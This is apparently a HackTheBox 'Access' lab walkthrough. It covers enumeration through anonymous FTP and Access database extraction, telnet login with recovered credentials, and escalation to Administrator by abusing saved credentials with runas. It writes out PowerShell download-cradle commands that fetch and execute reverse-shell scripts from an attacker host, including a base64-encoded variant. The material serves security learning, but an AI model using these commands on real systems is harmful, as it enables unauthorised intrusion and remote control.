> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-access.md).

# HackTheBox - Access

![](/files/-MY3iU2D7bhkud_zX8Eu)

### Nmap scan results (Basic and all port)

![](/files/-MY3ik6G6N40rw41qaF4)

```
nmap -sC -sV -oA nmap-access 10.10.10.98
```

![](/files/-MY3jcRaHU82aA2JfpVl)

### FTP Enumeration

FTP Anonymous access allowed, so we can get all the files present in that share.

![](/files/-MY3koKJbXxz6eTMWadH)

We have `AccessControl.zip` and `backup.mdb` file from the FTP Server.

> &#x20;A file with the **MDB** file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... **MDB** files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint.

### Exploring mdbtools

```
apt-get install mdbtools
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files
```

This command will download all the necessary tools required for analyzing the backup.mdb file.

We can list all the tables using mdb-tables or mdb-sql command.

Using mdb-tables:

![](/files/-MY3pyXltmMTaoI9BfLf)

Using mdb-sql:

![](/files/-MY3q743ICITBbF0l0se)

To extract the information from the tables, we can use mdb-json.

```
for i in $(mdb-tables backup.mdb);do mdb-json backup.mdb $i;done
```

![](/files/-MY3qLocpDh0oI287_pK)

&#x20;The password for zip file is stored inside this backup.mdb file and we can search for it.

![](/files/-MY3qkkJaP0K0q9qEu05)

![](/files/-MY3rXhrfL1O8m25LYiE)

### Analyzing .pst file using readpst&#x20;

We can convert .pst file into .mbox which can be human readable using `readpst` command.

![](/files/-MY3y2EJ9J25MEerioGm)

![](/files/-MY3yVUwN38pX28U7xyt)

### Using Telnet to get shell access

Password for the security account is changed to `4Cc3ssC0ntr0ller`

We can use telnet to get a shell access as security user.

![](/files/-MY3z8XSGx8rfv8CZtsL)

This shell is not really stable and we need to get stable shell for further enumeration. So we will be using nishang Shells from [github](https://github.com/samratashok/nishang/tree/master/Shells).

![](/files/-MY3zopyAAIXs1jKZSLB)

```
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')"
```

Make sure to add this line at the end of script to run as soon as it gets downloaded on the target computer.

![](/files/-MY4-knmwY190aEB4y_H)

![](/files/-MY4-oxSR37QGglkLKaQ)

### Running JAWS script for system enumeration

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1')
```

![](/files/-MY43Xtl-JpMaL7U65m-)

![Keep this in mind: cmdkey /list ](/files/-MY43xx0UEkRqmKrc5EV)

We find a very interesting file present under `C:\Users\Public\Desktop`

![](/files/-MY44cEOdDHGeMKBm7Rg)

### Privilege Escalation

We can view the raw contents of the file using `get-Content` command in powershell or we can view it the other way.

```
$WScript = New-Object -ComObject Wscript.Shell
$shortcut = Get-ChildItem *.lnk
$WScript.CreateShortcut($shortcut)
```

![](/files/-MY45ELs49VbxlAEANgp)

We can run this command as Administrator, so we will try to get a reverse shell using this.

![](/files/-MY47dNxhrqiUHcgQZWt)

We changed the port to 9002 since we already have a connection to port 9001. So now we need to use base64 encoded string to run certain windows commands.

```
echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
```

Windows uses UTF-16 Little Endian and we can convert it using iconv. Also after that we can use base64. w flag specifies `wrap encoded lines after COLS character`

```
runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA="
```

![](/files/-MY49WxW9jf6jAgF-vge)

{% hint style="info" %}
Note: If we want to access or read all the recently cracked hashes, then we can use the following command. `cat ~/.john/john.pot`
{% endhint %}
